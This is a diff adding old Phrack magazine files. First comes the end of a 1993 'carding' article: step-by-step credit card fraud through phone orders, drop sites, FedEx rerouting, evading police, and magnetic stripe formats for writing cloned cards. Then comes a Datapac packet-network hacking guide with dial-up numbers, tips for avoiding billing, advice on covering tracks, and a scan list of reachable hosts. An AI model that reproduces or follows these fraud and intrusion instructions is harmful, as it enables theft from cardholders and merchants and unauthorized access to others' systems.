+address, because if you change the ship to, they may have a tendency to
+get a tad suspicious.  Also, the reason you could use that you need the
+Fedex Tracking Number is for your Mail room.  Use your imagination, but
+keep your story the same, don't adlib too much, cause you may fuck up,
+but stick to the above format, it works very well.  Always try to be as
+pleasant as possible, because in the event you couldn't check the credit
+limit, you may have to give them another card.
+
+Stage 5 - Finding a drop site
+
+    This is one of the harder things to do.  If the billing address
+of the card is local to you, you may just want to go their house to pick up
+the package.  If not, find an apartment building close (but not too close)
+to where you live.  Or find a house that has a for sale sign in the front
+yard.  Or if you know some school buddy of yours that is away for vacation
+use his house (In that event, make SURE he has NO idea your doing this)
+Whatever the case may be, just find a place that is relatively secluded from
+the street, where there are places for you to park inconspicuously.
+Apartment buildings work EXTREMELY well.
+
+Stage 6 - Rerouting the package
+
+    This is a little trick one of my good friends showed me.  It works
+extremely well.  Call up Federal Express with your airbill number.  The
+number is 800-238-5355.  Tell them that you are not going to be in town
+that day to sign for your package that you will be at another location,
+and ask them if they could please send the package to a new address.  They
+may say that it will take an additional day to do that, depending on how
+far away it is.  INSIST that it arrives the next day, tell them its
+extremely important, and don't take any shit from them, ask for their
+supervisor if they gave you any problems.  Their commitment is
+overnight.  By the way, call Federal Express AS SOON AS you know they
+physically have the package, this way you give them as much time as they
+need to reroute.  Obviously your sending the package to your drop site that
+you found.
+
+Stage 7 - Picking up the package
+
+    This is by far the most DANGEROUS part of it.  If you are going to
+get caught, this is where its going to happen.  DON'T have a school buddy
+pick it up for you.  Instant doom.  DON'T pay someone to do it for you,
+lord knows they will sell you out in a second.  Not to mention, you're
+probably brighter than the average eggplant, so you may be able to talk
+your way out. "A guy on the street paid me this $20 bill to do it, I said
+what the fuck"  PLEASE USE EXTREME CAUTION WHEN DOING THIS.
+
+    OK. Call Federal Express, and make sure the package will be arriving
+that day, and that everything is on schedule.  Ask them what the route number
+is, an estimate of when it will be there, and their commitment time for
+that particular zip code.  Then, go there earlier than you need to be, and
+check out the place, look around for anyone who seems abnormal, look for
+escape routes, exits.  Look around, get a feel for where you are, and try
+to ration out why you might just be standing there or why you would have
+needed to pick up the package.  Remember, if you used all the precautions
+I've talked about, you should be in perfect shape.  Just relax, be cool, and
+everything will work out.
+
+    Walk around for a little bit, and find out the possible directions
+the Federal Express Van will be coming from.  Walk in front of the house
+just when he arrives. Pretend as though your just on your way home or just
+on your way out the door.  Sign for it, and you're done.
+
+    Ok, you say, I'm the nervous type, and I don't want the guy giving
+my description to the police, FBI, etc. (As though they will remember 1 out
+of the hundreds of deliveries a day)  Call up Federal Express and ask for
+a signature release.  This gives Fedex the right to leave the package at
+your front door, and this removes their responsibility.  OR, leave a note
+with your signature (not printed) on the door, mailbox, etc.  Remember though
+that the guy may come home (or look out his window) and see the package, or
+you signing it.
+
+    Remember there is nothing saying that you have to be there when the
+package arrives.  You can get a signature release or leave a note.  Make
+sure you are there as soon as possible AFTER they leave the package.  I
+actually prefer to be there, because when I just let it go, and check back
+later, it is almost NEVER there.  Either a> someone stole it b> a neighbor
+picked it up and put it in their house for them c> the owner is actually
+home and got the package (which is REALLY bogus, cause it's on their card!)
+
+    I have ALWAYS used an apartment building.  I have ALWAYS been there
+to pick the package up.  I have never been busted.  See, if you understand
+how the system works, you know that there is NO way that anyone knows that
+it is an illegal purchase.  If you look at it on a time line :
+
+  <----2:00pm-------2:05pm------8:00pm-----10am--->
+       verify       call        reroute    pickup
+
+    Now, if there is a problem, it will probably be either a> not enough
+credit left on the card (which is nothing, they will leave a message on your
+vmb) b> they called directory assistance and actually called that number or
+c> VISA/MC/AMEX/DISC called the customer to verify the purchase because it
+was larger than usual.
+
+    So obviously, if they got in touch with the card holder, or visa/etc
+called the card holder, they AREN'T going to ship the package - meaning you
+aren't going to show up anyways.  Of course you never use a drop site more
+than once, you never use a company more than once, and you never use a card
+more than once.
+
+    Once you get your package, KEEP YOUR MOUTH SHUT.  Don't jump on IRC,
+and say, "Hey Cameron, I just carded a new Amiga 4000."  And if you do
+eventually tell someone that you carded it, NEVER USE ANY SPECIFICS, no
+information about the company, the drop house, the name on the card, NOTHING.
+If you follow these instructions, you can guarantee you will have absolutely
+no problems, I have been doing this for quite some time, and have NEVER been
+bothered by any law enforcement concerning this.  I have never found anyone
+who was careful that got busted.  The people who have gotten busted for
+carding have either bragged about it, or let someone know before hand, or have
+been set up.
+
+    I have tried to cover all bases, but I'm positive I've missed a few
+so if anyone has questions, let me know.  I am always open to helping people
+and can be found on the IRC, in either #hack or one of the better #hack
+alternatives.
+
+    In addition to carding by phone, there is another possibility, that
+is writing credit cards with a magnetic stripe writer.  A certain group did
+this for EIGHT years, before getting caught.  This is worth a whole article
+to itself, but I'll just go over some guidelines.
+
+    Track I is 210 bpi. Track II is 75 bpi.
+
+    The next chart shows the Magnetic Stripe Data Format (Track I)
+
+ Field #   Length    Name of Field
+ -------   ------    -------------
+
+ 1         1         Start Sentinel (STX)
+ 2         1         Format Code
+ 3         13/16     Primary Account Number
+ 4         1         Separator (^) HEX 5E
+ 5         2-26      Card Holder Name
+ 6         1         Separator (^) HEX 5E
+ 7         4         Card Expiration in format MMYY
+ 8         3         Service Code (?) 000 WORKS.
+ 9         0/5       Pin Verification Field
+ 10                  Discretionary Data Depends on 3, 5, 9
+ 11        11        Visa Reserved Always last 11 positions
+ 12        1         End Sentinel (ETX)
+ 13        1         LRC
+
+    Maximum Record Length is 79 Characters
+
+    The next chart shows the Magnetic Stripe Data Format (Track II)
+
+ Field #   Length    Name of Field
+ -------   ------    -------------
+
+    1         1         Start Sentinel (STX)
+    2         13/16     Primary Account Number
+    3         1         Separator (=) HEX 3D
+    4         4         Card Expiration Date in format MMYY
+    5         3         Service Code (?) 000 works.
+    6         0/5       Pin Verification Field
+    7                   Discretionary Data Depends on 2, 6
+    8         1         End Sentinel (ETX)
+    9         1         LRC
+
+    "The LRC is calculated by performing a BITWISE XOR (Exclusive OR) on all
+ASCII values of the characters in the Inquiry - EXCLUDING the <STX> but
+INCLUDING the <ETX>."
+
+<STX> is HEX 02.
+<ETX> is HEX 03.
+
+    By the way, for my last article, "TTY SPOOFING", check Phrack 41 File 8.
+
+***** MANY thanks go out to my friends, of whom I won't mention because of
+      the delicacy of this topic.  I appreciate them sharing their knowledge
+      with me, and I feel I'm kind of returning the favor by writing this
+      article.  Thanks also go out to the Phrack Staff, both past and present
+      for putting out an excellent magazine, and continuing to distribute
+      information to the computer underground.
+
+***** Happy Hacking and Safe Carding!
+      VaxBuster '93
diff --git a/phrack44/21.txt b/phrack44/21.txt
new file mode 100644
index 0000000..5c6c32a
--- /dev/null
+++ b/phrack44/21.txt
@@ -0,0 +1,775 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 21 of 27
+
+****************************************************************************
+
+            ************************************************
+           /                    DataPac                     \
+          /                   Synapse 403                    \
+         /                                                    \
+        ********************************************************
+
+    All of us I am sure have read penultimate files on the workings of
+Tymnet or in some cases Sprintnet. These are staples in a hacker's diet.
+In fact any second rate "underground" BBS has complete sections on BT
+North America and the nets available therein. However one such net you
+will most likely see very little on, is Datapac.
+
+    Datapac was originated in the late seventies by Telecom Canada, a
+large partnership of Telcos and businesses interested in high speed data
+transfers between Business & Government systems which would be hassle free
+and cheaper in the long run. (The birth of most PSN's really.)
+
+    The significance of Datapac however is that it has changed very little
+by way of security in the past ten years, although it has extended
+access to most of the globe in one fashion or another. Datapac is not
+only a hacker's utopia due to lax (in some cases non-existant) security;
+it is also, for the most part, safe ground (this term is, of course, used
+somewhat lightly) for beginners and the unsure to try their luck/skill
+at the game of packet switched network hacking. The Datapac net is most
+important to Canadian Hackers who have direct access to it, and
+therefore (if you're lucky) direct access to the world.
+
+A list of dial-up ports in Canada follows.
+
+CITY (PROVINCE)           DIAL NUMBER (SPEED 2400)     DIAL NUMBER (SPEED 9600)
+===============           ========================     ========================
+
+(TOLL FREE-CANADA)                                         800-565-8805
+Abbotsford (BC)                                            604-855-3632
+Banff-Canmore(ALTA)                                        403-762-5603
+Barrie (ONT)                    705-721-2411               705-726-0168
+Bathurst (NB)                   506-548-8658               506-548-9837
+Belleville (ONT)                                           613-969-1161
+Brampton (ONT)                  416-796-3808
+Brantford (ONT)                 519-758-0058
+Brockville (ONT)                613-345-7550               613-498-0676
+Calgary (ALTA)                  403-263-5021               403-265-4081
+Campbell River (BC)             604-287-9166               604-286-9800
+Chatham (ONT)                   519-351-8950
+Chicoutimi - Jonqui (QUE)       418-543-8013               418-543-8512
+Chilliwack (BC)                                            604-792-5218
+Clarkson (ONT)                  416-823-6010
+Cornerbrook (NFLD)              709-634-9060               709-634-8406
+Cornwall (ONT)                                             613-936-9145
+Courtenay/Comox (BC)                                       604-334-9846
+Dawson Creek (BC)                                          604-782-8549
+Drayton Valley                                             403-542-2300
+Drummondville (QUE)                                        819-478-1741
+Duncan (BC)                                                604-746-8241
+Edmonton (ALTA)                 403-421-1428               403-429-2492
+Edmundston (NB)                                            506-735-8809
+Fort McMurray (ALTA)                                       403-790-2300
+Fort St John (BC)                                          604-787-8402
+Fredericton (NB)                506-459-2792               506-453-0754
+Granby (QUE)                                               514-375-9666
+Grand Centre (ALTA)                                        403-594-2636
+Grande Prairie (ALTA)                                      403-532-4533
+Guelph (ONT)                    519-763-3610               519-763-1280
+Halifax (NS)                    902-453-9100               902-453-2666
+Hamilton (ONT)                  416-523-6948               416-523-6855
+Kingston (ONT)                  613-546-0039               613-546-5764
+Kitchener (ONT)                 519-741-4000               519-741-1499
+Lethbridge (ALTA)                                          403-320-6200
+Lindsay (ONT)                                              705-328-2941
+Lloydminster (ALTA)                                        403-875-8069
+London (ONT)                    519-432-2710               519-432-7101
+Medicine Hat (ALTA)                                        403-528-3445
+Moncton (NB)                    506-856-5196               506-383-7780
+Montreal (QUE)                  514-861-4750               514-845-6014
+Nanaimo (BC)                                               604-741-1552
+Nelson (BC)                                                604-352-9258
+New Glasgow (NS)                902-755-4594
+North Bay (Ont)                                            705-495-4720
+Oshawa (ONT)                                               416-404-0596
+Ottawa (ONT)                    613-567-4552               613-563-7658
+Peace River (ALTA)                                         403-624-1165
+Penticton (BC)                                             604-490-0251
+Port Alberni (BC)                                          604-723-6178
+Port Hardy (BC)                                            604-949-8973
+Powell River (BC)                                          604-485-9646
+Prince George (BC)              604-561-9178               604-564-8953
+Prince Rupert (BC)                                         604-627-8937
+Quebec City (QUE)               418-647-2421               418-648-2611
+Quesnel (BC)                                               604-992-3854
+Red Deer (ALTA)                                            403-341-4033
+Regina (SASK)                   306-525-8760               306-347-9073
+Rimouski (QUE)                  418-725-3620
+Sault St-Marie (ONT)                                       705-942-7030
+Sarnia (ONT)                    519-339-9144               519-337-4727
+Saskatoon (SASK)                306-934-9100               306-665-1046
+Sherbrooke (QUE)                819-564-6417               819-829-1146
+Smithers (BC)                                              604-847-9173
+St Catherines (ONT)             416-687-3340               416-688-3433
+St. Jerome                                                 514-565-6552
+St John's (NFLD)                709-739-1499               709-739-6931
+St Johns (NB)                   506-633-1021               506-652-1482
+Ste Hyacinthe (QUE)                                        514-774-0720
+Sydney (NS)                     902-562-8224
+Terrace (BC)                                               604-638-8596
+Toronto (ONT)                   416-979-1232               416-979-1251
+Trois Rivieres (QUE)            819-373-9983               819-373-9070
+Truro (NS)                      902-893-5434
+Valleyfield (QUE)                                          514-377-2114
+Vancouver (BC)                  604-662-8747               604-662-7865
+Victoria (BC)                   604-380-3874               604-360-2673
+Whistler (BC)                                              604-932-8927
+William Lake (BC)                                          604-398-8632
+Windsor (ONT)                   519-973-1086               519-973-4633
+Winnipeg (MAN)                  204-947-6797               204-453-6099
+
+                       Connecting and Addressing
+
+    Once connected you will need to type one or three periods and a
+carriage return, this will produce a numerical format denoting your port
+address and node,
+                           XXXX XXXX
+    PORT Address-----------^    ^
+    NODE number-----------------^
+
+    Once this is established the network simply sits and waits for you to
+spit commands at it, in other words an address to whence you would like to
+travel. Failing this, idle time will have you disconnected, the time
+varies but averages around 1 or 2 minutes.
+
+    The formatting of a Datapac address is really quite simple and is
+most often 8 digits long (sometimes ten but we'll get to that later)
+The first four (the prefix) specify the current location in Canada,
+for instance large cities will have several, just as they will have
+more than one prefix in the phone directories. The last four digits
+are arbitrary, and correspond to the host number.
+
+    An address with ten numbers as opposed to eight (ie: xxxx xxxx xx) is
+utilizing a subaddress.  Quite often these machines will be independent
+of a cluster of nodes and there only to fulfill one task. Also they
+may simply be segregated machines for no apparent reason at all
+(except to make scans a bitch :>). Quite often you will find that
+subsystems work as a PAD or PAC allowing you re-enter the Dpac from
+a host level, therefore allowing you to make use of the company's
+inherent NUI and connect to other places on the Dpac that disallow
+collect calls.
+
+
+                 Connecting to Machines on the Dpac
+
+    Datapac, like most networks, uses NUIs (Network User ID) which
+keep accounting for all billed connections.  HOWEVER a great deal of
+machines on the Dpac allow for collect calls from within the network.
+Yet if you have a valid NUI you may connect to ANY machine hooked up
+to the Dpac (except those which are part of a closed user group).
+I have found that it is best to PAD hop and avoid the whole NUI
+problem entirely.  The following a list of connection messages
+and their explanations for inter-network calls.
+
+MESSAGE                         EXPLANATION
+-------                         -----------
+Call connected to: XXXXXXXX     A virtual circuit has been established
+                                between an originating DTE and a remote
+                                (receiving) DTE.
+
+Hunted                          The remote logical channel is part of
+                                a hunt group.
+
+Backed Up                       The call attempt to the remote DTE has failed.
+                                The network has re-directed the call to
+                                another predetermined DTE that has been
+                                optioned as backup.
+
+I                               The call has been placed to an international
+                                address.
+
+P                               Priority service.  Packet size: 128.
+
+N                               Normal service.  Packet size: 128 or 256.
+
+DNA                             Data Network Address of the originating DTE.
+
+LCN                             Logical Channel Number of the recipient DTE.
+
+NUI                             The call will be billed to the 6 to 8
+                                character Network User Identifier.
+
+CUG                             The recipient DTE is part of a closed user
+                                group.
+
+Reverse Charge                  The recipient DTE has accepted the charge
+                                associated With the established call.
+
+    These reactions apply to any calls made that are not "international"
+I will list the connect reactions for international calls in the following
+section.
+
+ DATAPAC INTERNATIONAL ACCESS PROCEDURES
+ ---------------------------------------
+
+    Datapac International provides outgoing and incoming access to 6 U.S.
+based Networks and to over 100 packet-switched networks around the world.
+To successfully complete such calls, Datapac has implemented the International
+CCITT X.75 procedures and X.121 International numbering plan.  Thus, the
+Datapac user originating an international call must use the following format:
+
+                                           (1) (DNIC) (FOREIGN ADDRESS)
+                                            :     :          :
+      One defines the Datapac International.:     :          :
+      Prefix.                                     :          :
+                                                  :          :
+      Packet networks are identified by a ........:          :
+      four digit number called a DNIC                        :
+      (data network identification code)                     :
+                                                             :
+      The foreign national address is .......................:
+      expressed as an eight to ten digit
+      address.
+
+Here is a list of useful DNIC's if you get the urge to scan "other" networks.
+
+    Sprintnet         3110
+    Bell South        3143
+    Centel            3148
+    BT Tymnet         3106
+    Accunet           3134
+    NYNEX             3144
+    U.S. West         3147
+    ADP Autonet       3126
+    Fedex             3138
+    Express           3139
+
+    If you are scanning (which I assume you might be) you will encounter a
+great many cryptic messages.  So many, in fact, I am sure you will loose
+count.  Some are worth mentioning some are not but here a few you might
+encounter.
+
+   CALL CLEARED --     A network problem within Datapac
+   TEMPORARY NETWORK   or a foreign network prevents either
+   PROBLEM (XXY)       the requested call from being established
+                       or the established call from being
+                       continued.  Try again later.
+
+  CALL CLEARED --     Either the foreign network requested is not
+  ADDRESS NOT IN      accessible from Datapac, or the foreign
+  SERVICE (XXY)       network address specified identifies a
+                      non-existent destination, i.e., the address is
+                      not yet assigned or no longer assigned.
+                      Verify with destination that the foreign
+                      network is accessible from Datapac and that
+                      the foreign network address is assigned.
+
+ CALL CLEARED --      The calling terminal is not permitted to
+ ACCESS BARRED        establish an international call to the
+ (XXY)                called destination address because of a
+                      closed user group violation.  Verify
+                      network address with destination.
+
+  CALL CLEARED --     Either the foreign network or the
+  COLLECT CALL        destination address is not willing to
+  REFUSED (XXY)       accept the collect calls.  Verify the call
+                      establishment procedures with destination.
+
+  CALL CLEARED --     The Call Request is considered invalid
+  INCOMPATIBLE        by the foreign network mainly because of
+  CALL OPTIONS        the incorrect number of digits in the
+  (XXY)               foreign network address.  Verify foreign
+                      network address with destination.
+
+  CALL CLEARED --     The destination is out of order, possibly
+  DESTINATION NOT     because the destination's network access
+  RESPONDING (XXY)    link is inoperative.  Try again later
+                      and verify with destination.
+
+  CALL CLEARED --     The destination address called is fully
+  DESTINATION BUSY    engaged (no logical channels available)
+  (XXY)               and cannot accept another call at this
+                      time.  Try again later.
+
+  CALL CLEARED --     This message indicates a protocol error at
+  REMOTE PROCEDURE    the remote DTE interface.  Check with remote
+  ERROR (XXY)         DTE  (destination).
+
+
+                      Outdials on Dpac
+
+    On most Dpac dialups there are also dialouts, however to use them you
+must either be calling from a Host on the Dpac or have a public access
+NUI.  The latter tends to be more difficult to get than the former.  A list of
+addresses for dialouts is available at 9210 0086 (the Datapac help
+center), however it is OLD and therefore somewhat inaccurate so I have
+not included it.  Also you will find that a majority of the dialouts
+are of the low baud rate variety, however there are a few 19.2
+dialouts as well.
+
+    While dialouts are quite often a pain in the ass to access, all hope is
+not lost.  Many of the machines you encounter on Dpac are LATservers,
+Gandalfs, System/370s, etc. with dialouts.  I have found more
+than a few that are COMPLETELY un-passworded with Global access
+dialouts.
+
+    Beyond all this, Dpac can also be very useful for covering your
+tracks while attempting to perform digital voyeurism on other networks
+like Sprintnet, Tymnet, etc.  It may mean that you have less leeway but it
+still makes the target site go through a bit more difficulty in tracking
+you down.
+
+    In closing this, I am leaving a scan through which you can get familiar
+with Dpac.  It is far from complete as a guide to Datapac, but lists
+many of the systems I have found that accept collect calls.
+I will first list prefixes and the areas they represent.
+
+    If you are looking a decent Datapac Scanner you can get one at
+403-283-5519, while this is not a public system, it will allow guest
+users to log on and transfer a scanner made for Procomm for Windows
+
+                     Partial Datapac Prefix List
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Calgary (ALTA)            6330   |    Clarkson (ONT)            9190
+Edmonton (ALTA)           5870   |    Halifax (NS)              7610
+Hamilton (ONT)            3850   |    Kitchener (ONT)           3340
+London (ONT)              3560   |    Montreal (QUE)            8270
+Ottawa (ONT)              8570   |    Quebec City (QUE)         4840
+Regina (SASK)             7210   |    St-John's (NB)            7460
+Saskatoon (SASK)          7110   |    St. John (NFLD)           7810
+Toronto (ONT)             9160   |    Vancouver (BC)            6710
+Windsor (ONT)             2950   |    Winnipeg (MAN)            6920
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+                             Scan List
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+<] NUA [>         <] Service Name [>    ($ = Refused Collect Connection)
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+20100071           $ VM/SP
+20200115             VAX/VMS
+20200116             VAX/VMS
+20200156             Diand Information System
+20200214           $ UNIX      (gtagmhs2)
+20200230             METS Dial-In Server  Enter your login name:
+2020024098           Control Port on Node Ottawa 6505 PAD
+20200286           $ VAX/VMS
+2020032099           MPX.25102: PASSWORD
+20200321             SunOS     Rel 4.1.3 (X25)
+20200322             SunOS          ""
+20200330             INETCO    Magicbank
+20200342             ::
+20200497             VAX/VMS
+202005421          $ VAX/VMS
+20200548             SunOS     Rel 4.1.3 (TMS470)
+20200582           $ VAX/VMS   Production System
+20200586             ULTRIX    v4.2 (fcsa)
+20200600           $ User Id/Usager:
+20200602           $ UNIX      (gtagmhs)
+20400011           $ VM/SP     BNRCEN
+20400089             XMUX      node: 320QUEEN
+20400157             HP3000    IDRC/CDRI/CIID:
+20400177             QL * IDENTIFIEZ-VOUS SVP * PLEASE SIGN ON:
+2040017777           GST Questions & Answers by Revenue Canada
+20400180             XMUX      node: STORE305
+20400205             VAX/VMS
+20400210             VMS/VAX
+20400249             UNIX
+20400268           $ VAX/VMS
+20400407           $ VAX/VMS
+20400459             MHP1201I TERMINAL CONNECTED TO PACKET/74
+20400470             ISM/TSO   READY TO HOST
+20400478             HP3000
+20400484             VAX/VMS
+20400529           $ XMUX      node: SMITHFLD
+20400642             CDCNET
+20400683             PACX      (user interface)
+20400712             UNIVERSITY OF OTTAWA
+20400860             VAX/VMS
+20401313             Network
+20401375             DATAPAC: DOT SYSTEM READY
+20500011             VM/SP     Canada Institute for Scientific & Tech Info
+20500036             enter v for vtam (roscoe or tso) d for dobis
+20500047           $ #
+20600029             SCO       domus1   SCO v/386
+20600222             Please enter password
+20700038           $ VAX/VMS
+20700040             Enter profile ID:
+20700053             NODE 57206798 (looks like an iNet2000?)
+20700122             XMUX      node: OTTAWA
+20700157             UNIX      ""
+20700187           $ VAX/VMS   Canada Centre for Remote Sensing Satellite Op.
+20700194             iNet2000
+20700195             iNet2000
+20700201           $ HP3000 Supply & Services Canada
+20700326             DATAPAC : NBA SYSTEM READY
+20700416             Operator Code:
+20700439             UNIX      (bcm_kernel)
+20700471             ISM       (7/E/1) ISM Systems Corp/Ottawa Processing
+20700538             XMUX      node: TMIXMUX0
+20700539             XMUX      node: TMIXMUX1
+20700540             XMUX      node: TMIXMUX2
+20700541             UNIX
+20700561
+20700591             Canadian Intl. Development Agency's BBS(CIDA)
+20700596             UNIX      Zoomit
+20700603             VAX/VMS
+20700611           $ DIAND INFO SYSTEM. ENTER SERVICE NAME
+20700615             SCO OD    Statsys1
+20700616           $ UNIX      gateway!login:
+20700617             UNIX      Zoomit
+20700652             UNIX
+20700665           $ NC-PASS
+20700666           $ NC-PASS
+20700718             OBS Online Services (WYLBUR)
+20700728             VAX/VMS
+20700740             UNIX
+20700741             VAX/VMS
+20800015             VAX/VMS
+20800033             VAX/VMS   v5.5-1
+20800043           $ DIAND Info System - INAC. Sioux Lookout.
+20800095             TSO
+20800187             VAX/VMS   FCSA System VAX/VMS 4.2
+21200014             CDCNET
+21200030           $ PACX
+21300047             Please Enter Password
+21600001             ::
+21700054             VAX/VMS
+21700073             ::
+22100034             HP3000    Burgess Wholesale Foods  MPE/XL -Kingston
+22100138             INT NET  Enter SecurID Passcode:
+22100188             VAX/VMS
+22400041             XMUX      node: BELLEVIL
+22600049             SERVICE ID=
+22700017             VAX/VMS
+23400121           $ UNIX      orillia x25
+23600035             VAX/VMS   Micro VAX 3100 / VMS 5.5
+23800176             VAX/VMS   v5.5-1
+23800236             XMUX      node: OTTAWA
+23800343             node 57216d65 (looks like an iNet2000)
+23800451           $ VAX/VMS   Certification System
+23800491             UNIX      X.29 Terminal Service
+23800505             ONLINE SERVICES(WYLBUR) ENTER USER ID-
+23800507                          ""       ""
+23800594             ENTER FUNCTION:(Fisheries & Oceans Canada)
+23800599             XMUX      node: MUX8
+23800684             VAX/VMS   INFOMART ONLINE
+23800685             VAX/VMS   INFOMART ONLINE
+23800700             SCO OD    vmabs   SCO Open Desktop
+24300084             VAX/VMS   v5.5
+24300149             XMUX      node: SAULTE
+24400061             SERVICE ID=
+24400096             DATAPAC : SUD SYSTEM READY
+24400146             HP3000    PROD.MULTICAR.SUDBURY  MPE XL
+24700021             SERVICE ID=
+24900011             VAX/VMS   INFOMART ONLINE
+24900024             ISM       (7/E/1) ISM Systems Corp. Ottawa Proc. Centre
+24900040             VAX/VMS
+24900057             ISM
+24900099             PACX      Gandalf Access Server
+25200014             TAL TORONTO
+25200017             VM/SP
+25200054             XMUX      node: TORONTO
+25200214             ISM       GUARDIAN INSURANCE - ENTER SYSTEM
+25200258             ::
+25700031             >
+25700057             VAX/VMS
+26100091             VAX/VMS
+28300080             VAX/VMS
+28300083             XMUX      node: XMUX1
+28300092             INETCO
+28300154             VAX/VMS
+28700014             VAX/VMS
+28700029             SERVICE ID=
+28700030             LEVITT SAFETY / THUNDER BAY
+29200013             VAX/VMS
+29300045           $ VAX/VMS
+29400052             Compuserve
+29400172             VAX/VMS
+29400176             Enter System Id:
+29400254             XMUX      node: WINDSOR
+29400263             ISM       CDNC
+29400264             ISM       CDNC
+29500009           $ Datapac Public OD
+29500071           $        ""
+29500072           $        ""
+29500073           $        ""
+29500074           $        ""
+29500075           $        ""
+29500092             ::
+29500137             ::
+29500139             PRIMOS    23.3.0  INTENG
+29500166           $ Datapac Public OD
+29500167           $        ""
+29500168           $        ""
+29500900           $        ""
+29500901           $        ""
+29600018             PRIMOS    v23     FAXON
+29600136             KMUX      GANDALF KMUX PWORD>
+2960075101           INETCO    Polystar E.C.U
+30500153             AXA Canada Data Center(PACKET/74)
+31500065             SCO OD    isgsys1   SCO Open Desktop 2.0
+31500076           $ PACX      UWO Computing & Communications Services
+315000767            XMUX      node: CCSMUX1
+31500083             XMUX      node: LONDON
+31500225             SCO OD    isg2      SCO Open Desktop 2.0
+31500490             XMUX      node: LONDON
+31500528             XMUX      node: SARNIA
+31500607             PRIMOS    23.3.0.R20   WPPENG
+31500726             UNIX      ADC T-SENTRY
+31500787             XMUX      node: BUNTINRI
+31500838             MHP201A DTPAC06L VER 7.0.3 APPLICATION:
+32400014             XMUX      node: LONDON
+32400016             ISP-LOGON-CHRISTIE
+32400067           $ VM/SP
+32400107             PRIMOS    22.1.2.R38   HUNT
+32400122               "           ""
+32500023             XMUX      node: LONDON1
+32500053             XMUX      node: 074
+32500099             XMUX      node: WIND
+32500149             enter passcode:
+32500202             VAX/VMS   W.R.C.S.S.B
+32500225             VAX/VMS   London system A - Boot Node - MicroVMS v4.7
+32500239             VAX/VMS
+32500274             VAX/VMS
+32500345           $ MHP1201I TERMINAL CONNECTED TO PACKET/74
+32500367             XMUX      node: WINDSOR
+32500369             UNIX
+32500383             XMUX      node: STERLING
+325003833            BOSX/DPX  (RISC?) Sterling Marking Products Inc.
+32500386             5251 Controller emulator - v.191 Password:
+32500396             VAX/VMS   MicroVMS 5.3-1
+32500406             VAX/VMS   MicroVMS 5.3-1
+32500523             SERVICE ID=
+32500680             XMUX      node: WINDSOR
+32500692             XMUX      node: WINDSOR
+32500713             XMUX      node: STTHOMAS
+32500850             DATAPAC: WII SYSTEM READY
+32600052             Compuserve
+32600056             PRIMOS    22.1.2.R3    PBTOOL
+32600243             VAX/VMS
+33400115             SERVICE ID=
+33400223             Adjusters Canada Inc. Please enter X25 Security
+33400246             PRIMOS    22.0.3.R37    BLTCAD
+33400306           $ Datapac Public OD
+33400337           $        ""
+33400344           $        ""
+33400345           $        ""
+33400346           $        ""
+33400347           $        ""
+33400348           $        ""
+33400349           $        ""
+33400521             ISM
+33400550             ULTRIX
+33400589           $ Datapac Public OD
+33400590           $        ""
+33400591           $        ""
+33400609             ISM
+33400630             PRIMOS     22.1.3 THOR Engle Canada
+33400672             UNIX       192.9.200.1
+334006723            MACHINE    (XMUX machine)
+33400694             Sim3278
+33400703             UNIX       AT&T SV - WLU
+3340070399           MPX.25102: PASSWORD
+33400892             ===>
+33400900           $ Datapac Public OD
+33400901           $        ""
+33401149             XMUX      node: KITCH
+33401414             Datapac Public OD
+33401415                    ""
+33401453             DYNIX     SpaeNaur SVR4
+33401462             Datapac Public OD
+33401475             Chase IoLan Terminal Server
+334014751            XMUX      node: WATERLOO
+33401528             UNIX
+33401537             Sim3278
+33500021             JMS Online Service. Please enter ID:
+33500033           $ ENTER LOGON REQUEST
+33500081             JMS Administator line. Enter SYSTEM or SERVICE.
+33500099                                 " "
+33500110             XMUX      node: WATERLOO
+33500136             Wilfrid Laurier University x.25 PAD
+33500142             Prudential Assurance / Kitchener
+33500196             University of Waterloo online Library
+33700015             PICK
+33700115             STARMASTER Agriculture Canada Ontario Regional Com. Cent.
+33700133             XMUX      node: 362
+33700216             XMUX      node: 767
+33700236             VAX/VMS   Wellington Country Roman Catholic School Board
+33700238             VAX/VMS
+33700345             VAX/VMS
+33700346           $ HP3000DTC Enter DTC port password:
+33700348             DATAPAC : KIT SYSTEM READY
+33700349           $ ZAM0001
+33700376           $ VAX/VMS   Ontario College Application Service
+33700393             ::
+33700465             ISM       NET-PASS NPA MAGIC
+34100013             VAX/VMS
+34200139             SERVICE ID=
+35100010           $ VAX/VMS
+35500179             PICK      WELCOME TO HAC INFO NETWORK
+35600110           $ Datapac Public OD
+35600158             UNIX      3x3
+35600273             DEVELNET  University/Hospital Network
+35600900           $ Datapac Public OD
+35600901           $        ""
+36200027             MHP201A U0000053  Ver 7.0.5 APPLICATION:
+36700021             USER NUMBER --
+36700026             VAX/VMS
+36700030             USER NUMBER --
+36700038           $ UNIX
+36700059             QINTER
+36700115             OCC System
+36700126             SERVICE ID=
+36700172             SAFEGUARD 2>
+36700183             XMUX      node: DP01
+36700184             XMUX      node: DP02
+36700185             HP3000
+36700369             NETWORK CONTROL
+36700372             SAFEGUARD 4>
+36700381             Sim3278
+36700382             Sim3278
+37200020             VAX/VMS
+37500014             VAX/VMS
+37600014             SERVICE ID=
+37600020             HP3000    HP900.HCB.CANADA  MPE/XL
+37600027             MHP1201I TERMINAL CONNECTED TO PACKET/400
+37600029             XMUX      node: HAMILTON
+37600044           $ ISM       SCC INTERACTIVE SERVICES
+37600066             MHP1201I TERMINAL CONNECTED TO 4.15 PACKET/74
+37600152             XMUX      node: HAMILTON
+37600166             XMUX      node: BUTLER
+37600176             XMUX      node: DISCOUNT
+38300083             VAX/VMS
+38500079           $ TANGRAM ARBITER LU1
+38500085             HCH Magic
+38500122             PACX      CCINFO
+38500150           $ Datapac Public OD
+38500151           $        ""
+38500152           $        ""
+38500153           $        ""
+38500154           $        ""
+38500163           $        ""
+38500164           $        ""
+38500165           $        ""
+38500198           $        ""
+38500200           $        ""
+38500201           $        ""
+38500202           $        ""
+38500203           $        ""
